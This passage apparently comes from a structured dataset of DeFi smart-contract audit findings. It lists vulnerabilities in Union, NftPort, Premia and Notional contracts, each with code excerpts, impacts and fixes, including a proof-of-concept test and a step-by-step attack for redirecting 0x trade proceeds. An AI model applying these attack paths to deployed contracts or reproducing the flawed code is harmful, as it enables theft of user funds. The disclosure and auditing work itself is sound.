voucheeIndex\\n uint256 voucheeIndex = voucheesLength;\\n vouchees[staker].push(Vouchee(borrower, uint96(voucherIndex)));\\n voucheeIndexes[borrower][staker] = Index(true, uint128(voucheeIndex));\\n```\\n\\nThere are block.number related downcasting, which is a smaller issue.\\n```\\nvouch.lastUpdated = uint64(block.number);\\n```\\nчJust use uint256, or use openzepplin safeCasting.чThe damage level from the number truncation is rated by:\\nUToken borrow and repaying downcasting > staking amount downcating truncation > the vouch index related downcasting. > block.number casting.ч```\\n function stakeWithPermit(\\n uint256 amount,\\n uint256 nonce,\\n uint256 expiry,\\n uint8 v,\\n bytes32 r,\\n bytes32 s\\n ) external whenNotPaused {\\n IDai erc20Token = IDai(stakingToken);\\n erc20Token.permit(msg.sender, address(this), nonce, expiry, true, v, r, s);\\n\\n stake(uint96(amount));\\n }\\n```\\n -getUserInfo() returns incorrect values for locked and stakedAmountчmediumчThe `getUserInfo()` function mixes up the values for `locked` and `stakedAmount`, so the value for each of these is returned for the other.\\nIn UnionLens.sol, the `getUserInfo()` function is used to retrieve information about a given user.\\nIn order to pull the user's staking information, the following function is called:\\n```\\n(bool isMember, uint96 locked, uint96 stakedAmount) = userManager.stakers(user);\\n```\\n\\nThis function is intended to return these three values from the UserManager.sol contract. However, in that contract, the function being called returns a Staker struct, which has the following values:\\n```\\nstruct Staker {\\n bool isMember;\\n uint96 stakedAmount;\\n uint96 locked;\\n}\\n```\\n\\nBecause both `locked` and `stakedAmount` have the type `uint96`, the function does not revert, and simply returns the incorrect values to the caller.чReverse the order of return values in the `getUserInfo()` function, so that it reads:\\n```\\n(bool isMember, uint96 stakedAmount, uint96 locked) = userManager.stakers(user);\\n```\\nчAny user or front end calling the `getUserInfo()` function will be given incorrect values, which could lead to wrong decisions.ч```\\n(bool isMember, uint96 locked, uint96 stakedAmount) = userManager.stakers(user);\\n```\\n -`AssetManager.rebalance()` will revert when the balance of `tokenAddress` in the money market is 0.чmediumч`AssetManager.rebalance()` will revert when the balance of `tokenAddress` in the money market is 0.\\nAssetManager.rebalance() tries to withdraw tokens from each money market for rebalancing here.\\n```\\n // Loop through each money market and withdraw all the tokens\\n for (uint256 i = 0; i < moneyMarketsLength; i++) {\\n IMoneyMarketAdapter moneyMarket = moneyMarkets[i];\\n if (!moneyMarket.supportsToken(tokenAddress)) continue;\\n moneyMarket.withdrawAll(tokenAddress, address(this));\\n\\n supportedMoneyMarkets[supportedMoneyMarketsSize] = moneyMarket;\\n supportedMoneyMarketsSize++;\\n }\\n```\\n\\nWhen the balance of the `tokenAddress` is 0, we don't need to call `moneyMarket.withdrawAll()` but it still tries to call.\\nBut this will revert because Aave V3 doesn't allow to withdraw 0 amount here.\\n```\\n function validateWithdraw(\\n DataTypes.ReserveCache memory reserveCache,\\n uint256 amount,\\n uint256 userBalance\\n ) internal pure {\\n require(amount != 0, Errors.INVALID_AMOUNT);\\n```\\n\\nSo `AssetManager.rebalance()` will revert if one money market has zero balance of `tokenAddress`.чIssue `AssetManager.rebalance()` will revert when the balance of `tokenAddress` in the money market is 0.\\nI think we can modify AaveV3Adapter.withdrawAll() to work only when the balance is positive.\\n```\\n function withdrawAll(address tokenAddress, address recipient)\\n external\\n override\\n onlyAssetManager\\n checkTokenSupported(tokenAddress)\\n {\\n address aTokenAddress = tokenToAToken[tokenAddress];\\n IERC20Upgradeable aToken = IERC20Upgradeable(aTokenAddress);\\n uint256 balance = aToken.balanceOf(address(this));\\n\\n if (balance > 0) {\\n lendingPool.withdraw(tokenAddress, type(uint256).max, recipient);\\n }\\n }\\n```\\nчThe money markets can't be rebalanced if there is no balance in at least one market.ч```\\n // Loop through each money market and withdraw all the tokens\\n for (uint256 i = 0; i < moneyMarketsLength; i++) {\\n IMoneyMarketAdapter moneyMarket = moneyMarkets[i];\\n if (!moneyMarket.supportsToken(tokenAddress)) continue;\\n moneyMarket.withdrawAll(tokenAddress, address(this));\\n\\n supportedMoneyMarkets[supportedMoneyMarketsSize] = moneyMarket;\\n supportedMoneyMarketsSize++;\\n }\\n```\\n -gas limit DoS via unbounded operationsчmediumчOnly one attack will lead to two types of vulnerabilities in `UserManager.sol` and `UToken.sol`\\nOn `UserManager.sol` ==> `updateTrust()` Case one: malicious users (members) can keep `vouching` Alice with `trustAmount == 0` until his `vouchers` array achieves the max limit (2**256-1) So when a normal member tries to give `vouching` to Alice with `trustAmount != 0` he will find because the `vouchers` array completely full.\\nCase two (which is more realistic ): malicious users (members) can keep `vouching` Alice with `trustAmount == 0` until his `vouchers` array achieves late's say 20% of max limit (2**256-1) The problem is when Alice invoke `borrow()` or `repayBorrow()` on `UToken.sol`\\n```\\n IUserManager(userManager).updateLocked(msg.sender, uint96(amount + fee), true);\\n …\\n IUserManager(userManager).updateLocked(borrower, uint96(repayAmount - interest), false);\\n```\\n\\nIt will call `updateLocked()` on `UserManager.sol`\\n```\\n function updateLocked(\\n address borrower,\\n uint96 amount,\\n bool lock\\n ) external onlyMarket {\\n uint96 remaining = amount;\\n\\n for (uint256 i = 0; i < vouchers[borrower].length; i++) {\\n \\n```\\n\\nThe for loop could go through `vouchers[]` which could be long enough to lead to a \"gas limit DoS via unbounded operations\" And the same thing with `registerMember()`, any user could lose all their fund in this transaction\\n```\\n function registerMember(address newMember) public virtual whenNotPaused {\\n if (stakers[newMember].isMember) revert NoExistingMember();\\n\\n uint256 count = 0;\\n uint256 vouchersLength = vouchers[newMember].length;\\n\\n // Loop through all the vouchers to count how many active vouches there\\n // are that are greater than 0. Vouch is the min of stake and trust\\n for (uint256 i = 0; i < vouchersLength; i++) {\\n```\\nчAdd check for `trustAmount == 0`ч1- The user couldn't get any more `vouching` 2- The user will be not able to `borrow()` or `repayBorrow()` 3- No one can in invokeregisterMember() successfully for a specific userч```\\n IUserManager(userManager).updateLocked(msg.sender, uint96(amount + fee), true);\\n …\\n IUserManager(userManager).updateLocked(borrower, uint96(repayAmount - interest), false);\\n```\\n -Template implementations doesn't validate configurations properlyчmediumчIn past audits, we have seen contract admins claim that invalidated configuration setters are fine since “admins are trustworthy”. However, cases such as Nomad got drained for over $150M and Misconfiguration in the Acala stablecoin project allows attacker to steal 1.2 billion aUSD have shown again and again that even trustable entities can make mistakes. Thus any fields that might potentially result in insolvency of protocol should be thoroughly checked.\\nNftPort template implementations often ignore checks for config fields. For the rest of the issue, we take `royalty` related fields as an example to illustrate potential consequences of misconfigurations. Notably, lack of check is not limited to `royalty`, but exists among most config fields.\\nAdmins are allowed to set a wrong `royaltiesBps` which is higher than `ROYALTIES_BASIS`. `royaltyInfo()` will accept this invalid `royaltiesBps` and users will pay a large amount of royalty.\\nEIP-2981 (NFT Royalty Standard) defines `royaltyInfo()` function that specifies how much to pay for a given sale price. In general, royalty should not be higher than 100%. NFTCollection.sol checks that admins can't set royalties to more than 100%:\\n```\\n /// Validate a runtime configuration change\\n function _validateRuntimeConfig(RuntimeConfig calldata config)\\n internal\\n view\\n {\\n // Can't set royalties to more than 100%\\n require(config.royaltiesBps <= ROYALTIES_BASIS, \"Royalties too high\");\\n\\n // rest of code\\n```\\n\\nBut `NFTCollection` only check `royaltiesBps` when admins call `updateConfig()`, it doesn't check `royaltiesBps` in `initialize()` function, leading to admins could set an invalid `royaltiesBps` (higher than 100%) when initializing contracts.\\nThe same problem exists in ERC721NFTProduct and ERC1155NFTProduct. Both ERC721NFTProduct and ERC1155NFTProduct don't check `royaltiesBasisPoints` in `initialize()` function. Furthermore, these contracts also don't check `royaltiesBasisPoints` when admins call `update()` function. It means that admins could set an invalid `royaltiesBasisPoints` which may be higher than 100% in any time.чIssue Template implementations doesn't validate configurations properly\\nCheck `royaltiesBps <= ROYALTIES_BASIS` both in `initialize()` and `update()` functions.чEIP-2981 only defines `royaltyInfo()` that it should return royalty amount rather than royalty percentage. It means that if the contract has an invalid royalty percentage which is higher than 100%, `royaltyInfo()` doesn't revert and users will pay a large amount of royalty.ч```\\n /// Validate a runtime configuration change\\n function _validateRuntimeConfig(RuntimeConfig calldata config)\\n internal\\n view\\n {\\n // Can't set royalties to more than 100%\\n require(config.royaltiesBps <= ROYALTIES_BASIS, \"Royalties too high\");\\n\\n // rest of code\\n```\\n -Freezing roles in ERC721NFTProduct and ERC1155NFTProduct is mootчmediumчIn ERC721NFTProduct and ERC1155NFTProduct roles can be frozen which is supposed to lock role to current addresses and not allow any changes. The problem is that admin can still use AccessControlUpgradable#grantRole and revokeRole to grant and remove roles to addresses because hasRole allows \"ADMIN_ROLE\" to bypass all role restrictions even \"DEFAULT_ADMIN_ROLE\".\\n```\\nfunction hasRole(bytes32 role, address account)\\n public\\n view\\n virtual\\n override\\n returns (bool)\\n{\\n return\\n super.hasRole(ADMIN_ROLE, account) || super.hasRole(role, account);\\n}\\n```\\n\\nIn GranularRoles.sol and AccessControlUpgradable.sol, developers are careful to never grant the \"DEFAULT_ADMIN_ROLE\" to any user. Additionally they never set the admin role of any role so that it's admin will remain \"DEFAULT_ADMIN_ROLE\". In theory this should make so that there is no way to grant or revoke roles outside of GranularRoles#_initRoles and updateRoles. The issue is that the override by GranularRoles#hasRole allows \"ADMIN_ROLE\" to bypass any role restriction including \"DEFAULT_ADMIN_ROLE\". This allows \"ADMIN_ROLE\" to directly call AccessControlUpgradable#grantRole and revokeRole, which makes the entire freezing system useless as it doesn't actually stop any role modification.чOverride AccessControlUpgradable#grantRole and revokeRole in GranularRoles.sol to revert when called:\\n```\\n GranularRoles.sol\\n\\n+ function grantRole(bytes32 role, address account) public virtual override {\\n+ revert();\\n+ }\\n\\n+ function revokeRole(bytes32 role, address account) public virtual override {\\n+ revert();\\n+ }\\n```\\nчFreezing roles doesn't actually prevent \"ADMIN_ROLE\" from modifying roles as intended. Submitting as high due to gross over-extension of admin authority clearly violating intended guardrails.ч```\\nfunction hasRole(bytes32 role, address account)\\n public\\n view\\n virtual\\n override\\n returns (bool)\\n{\\n return\\n super.hasRole(ADMIN_ROLE, account) || super.hasRole(role, account);\\n}\\n```\\n -registerTemplate() can't handle properly when ITemplate version is 0чmediumчFactory.sol when register one template , and template ' s version is 0, the latestImplementation[templateName] will be address(0) and add other version, \"_templateNames\" will duplicate\\nWhen version is equal 0 latestImplementation[templateName] don't set\\n```\\n function _setTemplate(\\n string memory templateName,\\n uint256 templateVersion,\\n address implementationAddress\\n ) internal {\\n// rest of code\\n\\n if (latestImplementation[templateName] == address(0)) { /****add other version, _templateNames will duplicate ****/\\n _templateNames.push(templateName);\\n }\\n\\n if (templateVersion > latestVersion[templateName]) {\\n latestVersion[templateName] = templateVersion;\\n latestImplementation[templateName] = implementationAddress; /****templateVersion==0 , don't set ****/\\n }\\n\\n }\\n```\\nч```\\n function _setTemplate(\\n string memory templateName,\\n uint256 templateVersion,\\n address implementationAddress\\n ) internal {\\n\\n - if (templateVersion > latestVersion[templateName]) {\\n + if (templateVersion > = latestVersion[templateName]) {\\n latestVersion[templateName] = templateVersion;\\n latestImplementation[templateName] = implementationAddress; \\n }\\n```\\nчlatestImplementation[templateName] and _templateNames will error. external contracts may think there is no setup, resulting in duplicate setups that keep failingч```\\n function _setTemplate(\\n string memory templateName,\\n uint256 templateVersion,\\n address implementationAddress\\n ) internal {\\n// rest of code\\n\\n if (latestImplementation[templateName] == address(0)) { /****add other version, _templateNames will duplicate ****/\\n _templateNames.push(templateName);\\n }\\n\\n if (templateVersion > latestVersion[templateName]) {\\n latestVersion[templateName] = templateVersion;\\n latestImplementation[templateName] = implementationAddress; /****templateVersion==0 , don't set ****/\\n }\\n\\n }\\n```\\n -Factory uses signature that do not have expirationчmediumчNftPort can't remove license from user, once the signature was provided to it, without changing `SIGNER_ROLE` address.\\nIn Factory contract there are few methods that are called when signed by trusted signer.\\nThis is how the signature is checked\\n```\\nsignedOnly(abi.encodePacked(msg.sender, instance, data), signature)\\n```\\n\\nAs you can see there is no any expiration time. That means that once, the signer has signed the signature for the user it can use it for the end of life. It's like lifetime license. The only option to remove the license from user is to revoke `SIGNER_ROLE` and set it to another account. But it's possible that the NFTPort will have a need to do that with current signer.чAdd expiration param to the signature.чLicense can't be removed.ч```\\nsignedOnly(abi.encodePacked(msg.sender, instance, data), signature)\\n```\\n -Underflow in ```_previewWithdraw``` could prevent withdrawalsчhighчAn underflow in the `_previewWithdraw` function in `AuctionInternal.sol` due to totalContractsSold exceeding auction.totalContracts could prevent users from withdrawing options.\\nThe `_previewWithdraw` function returns the fill and refund amounts for a buyer by looping over all orders. A totalContractsSold variable is used to track the amount of contracts sold as the loop iterates over all orders. If the current order's size + totalContractsSold exceeds the auction's totalContracts then the order will only be filled partially. The calculation for the partial fill (remainder) is given on line 318. This will lead to an underflow if totalContractsSold > the auction's totalContracts which would happen if there are multiple orders that cause the totalContractsSold variable to exceed totalContracts.\\nThe totalContractsSold variable in `_previewWithdraw` could exceed the auction.totalContracts due to the contracts sold before the start of an auction through limit orders not being limited. When an order is added, `_finalizeAuction` is only called if the auction has started. The `_finalizeAuction` function will call the `_processOrders` function which will return true if the auction has reached 100% utilization. Since limit orders can be made before the start of an auction, `_finalizeAuction` is not called and any amount of new orders may be made.\\nExample: The buyer makes a limit order with size > auction.totalContracts. They then make another order with size of anything. These orders are made before the start of the auction so `_processOrders` is not called for every new order and totalContractsSold can exceed totalContracts. When `_previewWithdraw` is called, after the buyer's first order is processed, totalContractsSold > auction.totalContracts so the condition on line 313 passes. Since totalContractsSold > auction.totalContracts the calculation on line 318 underflows and the transaction reverts. The `_previewWithdraw` function and thus the `_withdraw` function is uncallable.\\nTest code added to `Auction.behaviour.ts`, under the `#addLimitOrder(uint64,int128,uint256)` section:\\n```\\n it(\"previewWithdraw reverts if buyer has too many contracts\", async () => {\\n assert.isEmpty(await auction.getEpochsByBuyer(addresses.buyer1));\\n\\n await asset\\n .connect(signers.buyer1)\\n .approve(addresses.auction, ethers.constants.MaxUint256);\\n\\n const totalContracts = await auction.getTotalContracts(epoch);\\n await auction.addLimitOrder(\\n epoch,\\n fixedFromFloat(params.price.max),\\n totalContracts.mul(2)\\n );\\n\\n await auction.addLimitOrder(\\n epoch,\\n fixedFromFloat(params.price.max),\\n totalContracts.div(2)\\n );\\n\\n const epochByBuyer = await auction.getEpochsByBuyer(addresses.buyer1);\\n\\n assert.equal(epochByBuyer.length, 1);\\n assert.bnEqual(epochByBuyer[0], epoch);\\n \\n await expect(auction.callStatic[\\n \"previewWithdraw(uint64)\"\\n ](epoch)).to.be.reverted;\\n });\\n```\\n\\nThe test code above shows a buyer is able to add an order with size auction.totalContracts*2 and a subsequent order with size auction.totalContracts/2. The `previewWithdraw` function reverts when called.чThe loop in `_previewWithdraw` should check if the current totalContractsSold is >= totalContracts. If it is then the remainder should be set to 0 which would allow the current order to be fully refunded.\\nAdditionally, the orders for an auction should be checked before the auction starts. In `_addOrder`, consider adding a condition that will call `_processOrders` if the auction has not started yet. If `_processOrders` returns true then do not allow the order to be added. Or just allow the auction to be finalized before it starts if the total contracts sold has reached the auction's totalContracts.чUsers would be unable to withdraw from the Auction contract.ч```\\n it(\"previewWithdraw reverts if buyer has too many contracts\", async () => {\\n assert.isEmpty(await auction.getEpochsByBuyer(addresses.buyer1));\\n\\n await asset\\n .connect(signers.buyer1)\\n .approve(addresses.auction, ethers.constants.MaxUint256);\\n\\n const totalContracts = await auction.getTotalContracts(epoch);\\n await auction.addLimitOrder(\\n epoch,\\n fixedFromFloat(params.price.max),\\n totalContracts.mul(2)\\n );\\n\\n await auction.addLimitOrder(\\n epoch,\\n fixedFromFloat(params.price.max),\\n totalContracts.div(2)\\n );\\n\\n const epochByBuyer = await auction.getEpochsByBuyer(addresses.buyer1);\\n\\n assert.equal(epochByBuyer.length, 1);\\n assert.bnEqual(epochByBuyer[0], epoch);\\n \\n await expect(auction.callStatic[\\n \"previewWithdraw(uint64)\"\\n ](epoch)).to.be.reverted;\\n });\\n```\\n -Users can avoid performance fees by withdrawing before the end of the epoch forcing other users to pay their feesчmediumчNo performance fees are taken when user withdraws early from the vault but their withdrawal value will be used to take fees, which will be taken from other users.\\n```\\nuint256 adjustedTotalAssets = _totalAssets() + l.totalWithdrawals;\\n\\nif (adjustedTotalAssets > l.lastTotalAssets) {\\n netIncome = adjustedTotalAssets - l.lastTotalAssets;\\n\\n feeInCollateral = l.performanceFee64x64.mulu(netIncome);\\n\\n ERC20.safeTransfer(l.feeRecipient, feeInCollateral);\\n}\\n```\\n\\nWhen taking the performance fees, it factors in both the current assets of the vault as well as the total value of withdrawals that happened during the epoch. Fees are paid from the collateral tokens in the vault, at the end of the epoch. Paying the fees like this reduces the share price of all users, which effectively works as a fee applied to all users. The problem is that withdraws that take place during the epoch are not subject to this fee and the total value of all their withdrawals are added to the adjusted assets of the vault. This means that they don't pay any performance fee but the fee is still taken from the vault collateral. In effect they completely avoid the fee force all there other users of the vault to pay it for them.чFees should be taken on withdrawals that occur before vault is settledчUser can avoid performance fees and force other users to pay themч```\\nuint256 adjustedTotalAssets = _totalAssets() + l.totalWithdrawals;\\n\\nif (adjustedTotalAssets > l.lastTotalAssets) {\\n netIncome = adjustedTotalAssets - l.lastTotalAssets;\\n\\n feeInCollateral = l.performanceFee64x64.mulu(netIncome);\\n\\n ERC20.safeTransfer(l.feeRecipient, feeInCollateral);\\n}\\n```\\n -processAuction() in VaultAdmin.sol can be called multiple times by keeper if the auction is canceled.чmediumчprocessAuction() in VaultAdmin.sol can be called multiple times by keeper if the auction is canceled.\\nprocessAuction() in VaultAdmin.sol can be called multiple times by keeper, the code below would execute more than one times if the auction is canceled.\\nbecause it is the line of code inside the function processAuction in VaultAdmin.sol below that can change the auction status to PROCESSED.\\nthis code only runs when the auction is finalized, it not finalized, the auction is in Canceled State and\\n```\\n bool cancelled = l.Auction.isCancelled(lastEpoch);\\n bool finalized = l.Auction.isFinalized(lastEpoch);\\n\\n require(\\n (!finalized && cancelled) || (finalized && !cancelled),\\n \"auction is not finalized nor cancelled\"\\n );\\n```\\n\\nwould always pass because the auction is in cancel state.чIssue processAuction() in VaultAdmin.sol can be called multiple times by keeper if the auction is canceled.\\nWe recommend the project lock the epoch and make it impossible for keeper to call the processAuction again.чWhy the processAuction should not be called multiple times?\\nIn the first time it is called, the withdrawal lock is released so user can withdraw fund,\\n```\\n // deactivates withdrawal lock\\n l.auctionProcessed = true;\\n```\\n\\nthen if we called again, the lastTotalAssets can be updated multiple times.\\n```\\n // stores the last total asset amount, this is effectively the amount of assets held\\n // in the vault at the start of the auction\\n l.lastTotalAssets = _totalAssets();\\n```\\n\\nthe total asset can be lower and lower because people are withdrawing their fund.\\nthen when _collectPerformanceFee is called, the performance may still be collectedч```\\n bool cancelled = l.Auction.isCancelled(lastEpoch);\\n bool finalized = l.Auction.isFinalized(lastEpoch);\\n\\n require(\\n (!finalized && cancelled) || (finalized && !cancelled),\\n \"auction is not finalized nor cancelled\"\\n );\\n```\\n -`TradingUtils._executeTrade()` doesn't check `preTradeBalance` properly.чhighч`TradingUtils._executeTrade()` doesn't check `preTradeBalance` properly.\\n`TradingUtils._executeTrade()` doesn't check `preTradeBalance` properly.\\n```\\nfunction _executeTrade(\\n address target,\\n uint256 msgValue,\\n bytes memory params,\\n address spender,\\n Trade memory trade\\n) private {\\n uint256 preTradeBalance;\\n\\n if (trade.sellToken == address(Deployments.WETH) && spender == Deployments.ETH_ADDRESS) {\\n preTradeBalance = address(this).balance;\\n // Curve doesn't support Deployments.WETH (spender == address(0))\\n uint256 withdrawAmount = _isExactIn(trade) ? trade.amount : trade.limit;\\n Deployments.WETH.withdraw(withdrawAmount);\\n } else if (trade.sellToken == Deployments.ETH_ADDRESS && spender != Deployments.ETH_ADDRESS) {\\n preTradeBalance = IERC20(address(Deployments.WETH)).balanceOf(address(this));\\n // UniswapV3 doesn't support ETH (spender != address(0))\\n uint256 depositAmount = _isExactIn(trade) ? trade.amount : trade.limit;\\n Deployments.WETH.deposit{value: depositAmount }();\\n }\\n\\n (bool success, bytes memory returnData) = target.call{value: msgValue}(params);\\n if (!success) revert TradeExecution(returnData);\\n\\n if (trade.buyToken == address(Deployments.WETH)) {\\n if (address(this).balance > preTradeBalance) {\\n // If the caller specifies that they want to receive Deployments.WETH but we have received ETH,\\n // wrap the ETH to Deployments.WETH.\\n uint256 depositAmount;\\n unchecked { depositAmount = address(this).balance - preTradeBalance; }\\n Deployments.WETH.deposit{value: depositAmount}();\\n }\\n } else if (trade.buyToken == Deployments.ETH_ADDRESS) {\\n uint256 postTradeBalance = IERC20(address(Deployments.WETH)).balanceOf(address(this));\\n if (postTradeBalance > preTradeBalance) {\\n // If the caller specifies that they want to receive ETH but we have received Deployments.WETH,\\n // unwrap the Deployments.WETH to ETH.\\n uint256 withdrawAmount;\\n unchecked { withdrawAmount = postTradeBalance - preTradeBalance; }\\n Deployments.WETH.withdraw(withdrawAmount);\\n }\\n }\\n}\\n```\\n\\nIt uses `preTradeBalance` to manage the WETH/ETH deposits and withdrawals.\\nBut it doesn't save the correct `preTradeBalance` for some cases.\\nLet's assume `trade.sellToken = some ERC20 token(not WETH/ETH), trade.buyToken = WETH`\\nBefore executing the trade, `preTradeBalance` will be 0 as both `if` conditions are false.\\nThen all ETH inside the contract will be converted to WETH and considered as a `amountBought` here and here.\\nAfter all, all ETH of the contract will be lost.\\nAll WETH of the contract will be lost also when `trade.sellToken = some ERC20 token(not WETH/ETH), trade.buyToken = ETH` here.чWe should check `preTradeBalance` properly. We can remove the current code for `preTradeBalance` and insert the below code before executing the trade.\\n```\\nif (trade.buyToken == address(Deployments.WETH)) {\\n preTradeBalance = address(this).balance;\\n} else if (trade.buyToken == Deployments.ETH_ADDRESS) {\\n preTradeBalance = IERC20(address(Deployments.WETH)).balanceOf(address(this));\\n}\\n```\\nчAll of ETH/WETH balance of the contract might be lost in some cases.ч```\\nfunction _executeTrade(\\n address target,\\n uint256 msgValue,\\n bytes memory params,\\n address spender,\\n Trade memory trade\\n) private {\\n uint256 preTradeBalance;\\n\\n if (trade.sellToken == address(Deployments.WETH) && spender == Deployments.ETH_ADDRESS) {\\n preTradeBalance = address(this).balance;\\n // Curve doesn't support Deployments.WETH (spender == address(0))\\n uint256 withdrawAmount = _isExactIn(trade) ? trade.amount : trade.limit;\\n Deployments.WETH.withdraw(withdrawAmount);\\n } else if (trade.sellToken == Deployments.ETH_ADDRESS && spender != Deployments.ETH_ADDRESS) {\\n preTradeBalance = IERC20(address(Deployments.WETH)).balanceOf(address(this));\\n // UniswapV3 doesn't support ETH (spender != address(0))\\n uint256 depositAmount = _isExactIn(trade) ? trade.amount : trade.limit;\\n Deployments.WETH.deposit{value: depositAmount }();\\n }\\n\\n (bool success, bytes memory returnData) = target.call{value: msgValue}(params);\\n if (!success) revert TradeExecution(returnData);\\n\\n if (trade.buyToken == address(Deployments.WETH)) {\\n if (address(this).balance > preTradeBalance) {\\n // If the caller specifies that they want to receive Deployments.WETH but we have received ETH,\\n // wrap the ETH to Deployments.WETH.\\n uint256 depositAmount;\\n unchecked { depositAmount = address(this).balance - preTradeBalance; }\\n Deployments.WETH.deposit{value: depositAmount}();\\n }\\n } else if (trade.buyToken == Deployments.ETH_ADDRESS) {\\n uint256 postTradeBalance = IERC20(address(Deployments.WETH)).balanceOf(address(this));\\n if (postTradeBalance > preTradeBalance) {\\n // If the caller specifies that they want to receive ETH but we have received Deployments.WETH,\\n // unwrap the Deployments.WETH to ETH.\\n uint256 withdrawAmount;\\n unchecked { withdrawAmount = postTradeBalance - preTradeBalance; }\\n Deployments.WETH.withdraw(withdrawAmount);\\n }\\n }\\n}\\n```\\n -Bought/Purchased Token Can Be Sent To Attacker's Wallet Using 0x AdaptorчhighчThe lack of recipient validation against the 0x order within the 0x adaptor (ZeroExAdapter) allows the purchased/output tokens of the trade to be sent to the attacker's wallet.\\nBackground\\nHow does the emergency vault settlement process work?\\nAnyone can call the `settleVaultEmergency` function to trigger the emergency vault settlement as it is permissionless\\nThe `_getEmergencySettlementParams` function will calculate the excess BPT tokens within the vault to be settled/sold\\nThe amount of excess BPT tokens will be converted to an equivalence amount of strategy tokens to be settled\\nThe strategy tokens will be settled by withdrawing staked BPT tokens from Aura Finance back to the vault for redemption.\\nThe vault will then redeem the BTP tokens from Balancer to redeem its underlying assets (WETH and stETH)\\nThe primary and secondary assets of the vault are WETH and stETH respectively. The secondary asset (stETH) will be traded for the primary asset (WETH) in one of the supported DEXes. In the end, only the primary assets (WETH) should remain within the vault.\\nThe WETH within the vault will be sent to Notional, and Notional will mint the asset tokens (cEther) for the vault in return.\\nAfter completing the emergency vault settlement process, the vault will gain asset tokens (cEther) after settling/selling its excess BPT tokens.\\nIssue Description\\nThe caller of the `settleVaultEmergency` function can specify the trade parameters to sell the secondary tokens (stETH) for primary tokens (WETH) in any of the supported 5 DEX protocols (Curve, Balancer V2, Uniswap V2 & V3 and 0x) in Step 5 of the above emergency vault settlement process.\\nAfter analyzing the adaptors of 5 DEX protocols (Curve, Balancer V2, Uniswap V2 & V3 and 0x), it was observed that Curve, Balancer V2, Uniswap V2, and Uniswap V3 are designed in a way that the purchased tokens can only be returned to the vault.\\nTake the Uniswap V2 adaptor as an example. When the vault triggers the trade execution, it will always pass its own address `address(this)` `to` the `from` parameter of the `getExecutionData` function. The value of `from` parameter will be passed `to` the `to` parameter of Uniswap's `swapExactTokensForTokens` function, which indicates the recipient of the output/purchased tokens. Therefore, it is impossible for the caller `to` specify the recipient of the output tokens `to` another address. This is also the same for Curve, Balancer V2, and Uniswap V3.\\n```\\nFile: UniV2Adapter.sol\\n function getExecutionData(address from, Trade calldata trade)\\n..SNIP..\\n executionCallData = abi.encodeWithSelector(\\n IUniV2Router2.swapExactTokensForTokens.selector,\\n trade.amount,\\n trade.limit,\\n data.path,\\n from,\\n trade.deadline\\n );\\n```\\n\\nHowever, this is not implemented for the 0x adaptor (ZeroExAdapter). The `from` of the `getExecutionData` is completely ignored, and the caller has the full flexibility of crafting an order that benefits the caller.\\n```\\nFile: ZeroExAdapter.sol\\nlibrary ZeroExAdapter {\\n /// @dev executeTrade validates pre and post trade balances and also\\n /// sets and revokes all approvals. We are also only calling a trusted\\n /// zero ex proxy in this case. Therefore no order validation is done\\n /// to allow for flexibility.\\n function getExecutionData(address from, Trade calldata trade)\\n internal view returns (\\n address spender,\\n address target,\\n uint256 /* msgValue */,\\n bytes memory executionCallData\\n )\\n {\\n spender = Deployments.ZERO_EX;\\n target = Deployments.ZERO_EX;\\n // msgValue is always zero\\n executionCallData = trade.exchangeData;\\n }\\n}\\n```\\n\\nA number of features are supported by 0x. The full list of the supported features can be found here. Specifically, the following are the functions of attacker interest because it allows the attacker to configure the `recipient` parameter so that the bought tokens will be redirected to the attacker's wallet instead of the vault.\\nLiquidityProviderFeature - sellToLiquidityProvider\\n```\\n /// @dev Sells `sellAmount` of `inputToken` to the liquidity provider\\n /// at the given `provider` address.\\n /// @param inputToken The token being sold.\\n /// @param outputToken The token being bought.\\n /// @param provider The address of the on-chain liquidity provider\\n /// to trade with.\\n /// @param recipient The recipient of the bought tokens. If equal to\\n /// address(0), `msg.sender` is assumed to be the recipient.\\n /// @param sellAmount The amount of `inputToken` to sell.\\n /// @param minBuyAmount The minimum acceptable amount of `outputToken` to\\n /// buy. Reverts if this amount is not satisfied.\\n /// @param auxiliaryData Auxiliary data supplied to the `provider` contract.\\n /// @return boughtAmount The amount of `outputToken` bought.\\n function sellToLiquidityProvider(\\n IERC20TokenV06 inputToken,\\n IERC20TokenV06 outputToken,\\n ILiquidityProvider provider,\\n address recipient,\\n uint256 sellAmount,\\n uint256 minBuyAmount,\\n bytes calldata auxiliaryData\\n )\\n```\\n\\nUniswapV3Feature - sellTokenForTokenToUniswapV3\\n```\\n /// @dev Sell a token for another token directly against uniswap v3.\\n /// @param encodedPath Uniswap-encoded path.\\n /// @param sellAmount amount of the first token in the path to sell.\\n /// @param minBuyAmount Minimum amount of the last token in the path to buy.\\n /// @param recipient The recipient of the bought tokens. Can be zero for sender.\\n /// @return buyAmount Amount of the last token in the path bought.\\n function sellTokenForTokenToUniswapV3(\\n bytes memory encodedPath,\\n uint256 sellAmount,\\n uint256 minBuyAmount,\\n address recipient\\n )\\n```\\n\\nThe malicious user could perform the following actions to steal the assets:\\nAllow malicious users to specify the recipient of the output/purchased tokens to be themselves instead of the vault. This will cause the output/purchased tokens of the trade to be redirected to the malicious users instead of the vault\\nSpecify the `minBuyAmount` parameter of the order to `1 WEI` so that he only needs to provide `1 WEI` to fill the order to obtain all the secondary token (stETH) that need to be sold. This is allowed as there is no slippage control within 0x adaptor (Refer to my \"No Slippage Control If The Trade Executes Via 0x DEX During Emergency Vault Settlement\" issue write-up)чIt is recommended to implement validation against the submitted 0x trade order to ensure that the recipient of the bought tokens is set to the vault when using the 0x DEX. Consider implementing the following validation checks.\\n```\\nlibrary ZeroExAdapter {\\n /// @dev executeTrade validates pre and post trade balances and also\\n /// sets and revokes all approvals. We are also only calling a trusted\\n /// zero ex proxy in this case. Therefore no order validation is done\\n /// to allow for flexibility.\\n function getExecutionData(address from, Trade calldata trade)\\n internal view returns (\\n address spender,\\n address target,\\n uint256 /* msgValue */,\\n bytes memory executionCallData\\n )\\n {\\n spender = Deployments.ZERO_EX;\\n target = Deployments.ZERO_EX;\\n \\n _validateExchangeData(from, trade);\\n \\n // msgValue is always zero\\n executionCallData = trade.exchangeData;\\n }\\n \\n function _validateExchangeData(address from, Trade calldata trade) internal pure {\\n bytes calldata _data = trade.exchangeData;\\n\\n address inputToken;\\n address outputToken;\\n address recipient;\\n uint256 inputTokenAmount;\\n uint256 minOutputTokenAmount;\\n\\n require(_data.length >= 4, \"Invalid calldata\");\\n bytes4 selector;\\n assembly {\\n selector := and(\\n // Read the first 4 bytes of the _data array from calldata.\\n calldataload(add(36, 